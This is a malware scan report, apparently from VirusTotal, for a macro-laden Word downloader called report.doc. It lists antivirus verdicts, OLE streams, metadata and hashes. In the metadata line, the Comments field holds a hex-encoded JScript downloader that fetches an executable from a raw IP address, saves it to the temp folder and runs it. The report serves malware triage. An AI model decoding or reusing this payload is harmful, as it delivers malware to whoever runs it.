SHA256: 3a56be53c1493e1bcfae1c22750a1511460a42984c0388fd7bf2b75e9ed041b4
File name: report.doc
Detection ratio: 7 / 53
Analysis date: 2016-08-12 13:03:25 UTC ( 1 year, 4 months ago )
Antivirus Result Update
Avira (no cloud) W2000M/Agent.6792369 20160812
ESET-NOD32 VBA/TrojanDownloader.Agent.BOO 20160812
Ikarus Trojan-Downloader.VBA.Agent 20160812
Sophos AV Troj/DocDl-EHO 20160812
Symantec W97M.Downloader 20160812
TrendMicro W2KM_DLOADR.YYSRJ 20160812
TrendMicro-HouseCall W2KM_DLOADR.YYSRJ 20160812
Ad-Aware 20160812
AegisLab 20160812
AhnLab-V3 20160812
Alibaba 20160812
ALYac 20160812
Antiy-AVL 20160812
Arcabit 20160812
Avast 20160812
AVG 20160812
AVware 20160812
Baidu 20160812
BitDefender 20160812
Bkav 20160812
CAT-QuickHeal 20160812
ClamAV 20160811
CMC 20160811
Comodo 20160812
Cyren 20160812
DrWeb 20160812
Emsisoft 20160812
F-Prot 20160812
F-Secure 20160812
Fortinet 20160812
GData 20160812
Jiangmin 20160812
K7AntiVirus 20160812
K7GW 20160812
Kaspersky 20160812
Kingsoft 20160812
Malwarebytes 20160812
McAfee 20160812
McAfee-GW-Edition 20160812
Microsoft 20160811
eScan 20160812
NANO-Antivirus 20160812
nProtect 20160812
Panda 20160812
Qihoo-360 20160812
SUPERAntiSpyware 20160812
Tencent 20160812
TheHacker 20160812
VBA32 20160811
VIPRE 20160812
ViRobot 20160812
Zillya 20160812
Zoner 20160812
The file being studied follows the Compound Document File format. More specifically, it is an MS Word Document file.
Commonly abused properties
The studied file makes use of macros. A macro is a series of commands and instructions grouped together as a single command to accomplish a task automatically. Macros are often abused to perform malicious tasks when working with a document.
May create OLE objects.
Seems to contain deobfuscation code.
Summary
last_author: admin
creation_datetime: 2016-08-06 17:17:00
revision_number: 2
author: c
word_count: 23
page_count: 1
last_saved: 2016-08-06 17:17:00
template: Normal.dot
keywords: g
title:
character_count: 116
subject: b
code_page: Cyrillic
application_name: Microsoft Office Word
Document summary
category: f
byte_count: 25088
company: e
characters_with_spaces: 137
line_count: 4
manager: d
version: 730895
paragraph_count: 2
code_page: Cyrillic
OLE Streams
name: Root Entry, clsid: 00020906-0000-0000-c000-000000000046, type_literal: root, clsid_literal: MS Word, sid: 0, size: 4096
type_literal: stream, size: 113, name: \x01CompObj, sid: 18
type_literal: stream, size: 4096, name: \x05DocumentSummaryInformation, sid: 5
type_literal: stream, size: 4096, name: \x05SummaryInformation, sid: 4
type_literal: stream, size: 4096, name: 1Table, sid: 2
type_literal: stream, size: 4993, name: Data, sid: 1
type_literal: stream, size: 412, name: Macros/PROJECT, sid: 17
type_literal: stream, size: 65, name: Macros/PROJECTwm, sid: 16
type_literal: stream, size: 51332, type: macro, name: Macros/VBA/Module1, sid: 11
type_literal: stream, size: 1097, type: macro (only attributes), name: Macros/VBA/ThisDocument, sid: 8
type_literal: stream, size: 11069, name: Macros/VBA/_VBA_PROJECT, sid: 12
type_literal: stream, size: 1208, name: Macros/VBA/__SRP_0, sid: 14
type_literal: stream, size: 106, name: Macros/VBA/__SRP_1, sid: 15
type_literal: stream, size: 192, name: Macros/VBA/__SRP_2, sid: 9
type_literal: stream, size: 66, name: Macros/VBA/__SRP_3, sid: 10
type_literal: stream, size: 571, name: Macros/VBA/dir, sid: 13
type_literal: stream, size: 4152, name: WordDocument, sid: 3
Macros and VBA code streams
Module1.bas Macros/VBA/Module1 20029 bytes
create-ole obfuscated
ExifTool file metadata
Category: f
SharedDoc: No
Author: c
CodePage: Windows Cyrillic
LinksUpToDate: No
LastModifiedBy: admin
HeadingPairs: , 1
Template: Normal.dot
CharCountWithSpaces: 137
CreateDate: 2016:08:06 16:17:00
CompObjUserType: ???????? Microsoft Office Word
ModifyDate: 2016:08:06 16:17:00
Company: e
HyperlinksChanged: No
Characters: 116
ScaleCrop: No
RevisionNumber: 2
MIMEType: application/msword
Words: 23
Bytes: 25088
FileType: DOC
Lines: 4
AppVersion: 11.9999
Security: None
Software: Microsoft Office Word
TotalEditTime: 0
Pages: 1
CompObjUserTypeLen: 31
Manager: d
FileTypeExtension: doc
Paragraphs: 2
Keywords: g
Subject: b

File identification
MD5 8783e267751086a09130de0b16de5dec
SHA1 575f0f7f672a66eba44455eb5efaefa6443e760c
SHA256 3a56be53c1493e1bcfae1c22750a1511460a42984c0388fd7bf2b75e9ed041b4
ssdeep
1536:72KlEr8E2Xv29H0nk9wDVbo7TmfwNSei:TlE8qUVpsi

File size 91.5 KB ( 93696 bytes )
File type MS Word Document
Magic literal
CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: , Subject: b, Author: c, Keywords: g, Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d, Template: Normal.dot, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Aug 05 16:17:00 2016, Last Saved Time/Date: Fri Aug 05 16:17:00 2016, Number of Pages: 1, Number of Words: 23, Number of Characters: 116, Security: 0

TrID Microsoft Word document (80.0%)
Generic OLE2 / Multistream Compound File (20.0%)
Tags
obfuscated macros doc create-ole

VirusTotal metadata
First submission 2016-08-11 10:13:25 UTC ( 1 year, 4 months ago )
Last submission 2017-11-21 20:46:36 UTC ( 3 weeks, 5 days ago )
File names 0I_N4qMDk3.bin
aa
virus-monparfum.do_
info.doc
0F263AA3-CB78-4130-B557-AC9FB5303602_1d1f492dc847d9b
report.doc